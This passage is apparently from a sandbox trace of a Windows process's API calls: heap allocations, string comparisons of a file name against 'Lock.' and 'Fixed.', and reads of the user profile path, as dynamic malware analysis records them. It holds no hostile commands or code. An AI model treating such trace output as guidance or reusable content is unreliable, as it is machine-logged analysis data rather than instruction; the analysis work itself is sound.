Size=0x10) returned 0x2aaa7c8 [0208.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0208.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0208.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0208.707] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="619JnEBOuc.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0208.707] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="19JnEBOuc.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0208.707] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9JnEBOuc.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0208.707] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JnEBOuc.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0208.707] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nEBOuc.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0208.707] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EBOuc.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0208.707] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOuc.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0208.707] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ouc.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0208.707] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uc.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0208.707] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0208.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0208.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0208.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0208.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0208.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0208.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0208.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0208.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0208.707] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0208.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0208.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0208.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0208.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0208.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0208.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0208.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0208.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0208.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0208.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0208.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0208.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0208.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0208.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0208.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0208.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0208.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0208.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0208.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1e) returned 0x2a77d28 [0208.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73068 [0208.708] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="619JnEBOuc.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0208.708] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="19JnEBOuc.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0208.708] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9JnEBOuc.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0208.708] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JnEBOuc.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0208.708] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nEBOuc.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0208.708] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EBOuc.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0208.708] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOuc.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0208.708] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ouc.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0208.708] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uc.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0208.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0208.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0208.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0208.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0208.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0208.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0208.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0208.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0208.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0208.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0208.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0208.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0208.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0208.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a698e0 | out: hHeap=0x2af0000) returned 1 [0208.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0208.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0208.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0208.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0208.709] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0208.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0208.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0208.709] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0208.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0208.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0208.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0208.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71ad8 [0208.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0208.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0208.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0208.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0208.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0208.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0208.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0208.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0208.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0208.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0208.709] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0208.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0208.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0208.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa6d8 [0208.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0208.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0208.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7f8 [0208.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0208.710] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0208.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0208.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0208.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0208.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0208.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0208.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0208.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0208.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0208.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0208.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0208.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0208.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0208.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0208.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0208.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fa0 [0208.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0208.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3f58 [0208.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0208.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0208.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0208.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0208.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0208.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0208.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0208.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0208.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fa0 | out: hHeap=0x2af0000) returned 1 [0208.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0208.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0208.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71ae8 [0208.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0208.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0208.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0208.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0208.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0208.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0208.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0208.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0208.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0208.711] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0208.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0208.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0208.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa660 [0208.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0208.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0208.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa588 [0208.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0208.712] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0208.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0208.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0208.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0208.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0208.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0208.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0208.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0208.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0208.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0208.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0208.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0208.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0208.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0208.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0208.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7160 [0208.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0208.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3ee0 [0208.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0208.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0208.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0208.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0208.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0208.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0208.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7160 | out: hHeap=0x2af0000) returned 1 [0208.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0208.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0208.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b48 [0208.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0208.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0208.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0208.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0208.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719f8 [0208.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0208.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0208.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0208.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa6c0 [0208.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0208.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0208.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0208.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0208.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0208.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0208.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0208.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0208.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0208.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0208.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0208.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0208.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0208.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0208.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0208.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0208.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0208.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0208.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0208.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0208.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0208.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0208.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0208.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0208.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0208.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0208.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0208.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0208.716] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0208.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0208.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0208.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0208.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0208.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0208.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0208.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0208.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0208.717] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0208.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0208.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0208.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0208.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0208.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0208.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0208.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0208.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0208.717] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0208.717] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0208.717] RtlAllocateHeap (HeapHandle=0x2af0000, 